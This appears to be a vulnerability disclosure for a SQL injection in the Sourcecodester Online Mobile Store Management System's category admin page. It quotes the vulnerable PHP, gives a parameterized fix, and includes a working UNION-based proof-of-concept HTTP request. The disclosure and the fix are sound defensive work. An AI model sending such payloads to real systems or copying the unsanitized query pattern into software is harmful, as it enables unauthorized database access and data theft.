Blind SQL Injection Manage Category - Mobile Management Store.md

File metadata and controls

50 lines (38 loc) · 1.24 KB

Sourcecodester / Mobile Management Store - Blind SQL Injection

Vendor Homepage:

https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html

Affected Component

/admin/maintenance/manage_category.php

Code

```php
<?php
require_once('../../config.php');
// The numeric check is not a sanitiser: PHP's loose comparison evaluates a
// string such as "2' AND ..." by its leading digits, so the check passes and
// the raw parameter is interpolated straight into the SQL text below.
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `categories` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        // Each column of the row is exposed as a variable of the same name.
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>
```
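A hardened form of the handler above, added here as an example and not code from the Sourcecodester project; it assumes `$conn` is the mysqli connection set up by `config.php` (consistent with the `->query()` and `num_rows` usage above), that mysqlnd is available for `get_result()`, and that a column named `name` exists (an assumed column name).

```php
<?php
// Added example (not the vendor's code): manage_category.php with the
// user-supplied id validated strictly and bound as a query parameter.
require_once('../../config.php');

// Accept only a positive decimal integer. Unlike `$_GET['id'] > 0`, this
// rejects "2' AND FALSE UNION SELECT ..." instead of truncating it to 2.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('invalid id');
}

// Prepared statement: the SQL text is fixed; $id travels as data, so quotes
// or keywords inside it can never alter the query structure.
$stmt = $conn->prepare('SELECT * FROM `categories` WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();
$result = $stmt->get_result();   // requires mysqlnd (assumption)

$category = $result->fetch_assoc();
$stmt->close();
if ($category === null) {
    http_response_code(404);
    exit('category not found');
}

// Read columns explicitly rather than through $$k, so that column names
// coming back from the database cannot overwrite variables in this script.
$name = $category['name'] ?? '';   // 'name' is an assumed column
?>
```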

Proof of Concept

HTTP Request Example

```http
GET /admin/maintenance/manage_category.php?id=2'+AND+FALSE+UNION+SELECT+1,version(),3,4,5--+- HTTP/1.1
Host: [REDACTED]
sec-ch-ua: 
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=[REDACTED]
Connection: close
```


Screenshot

image

Credits

Russel James Avenido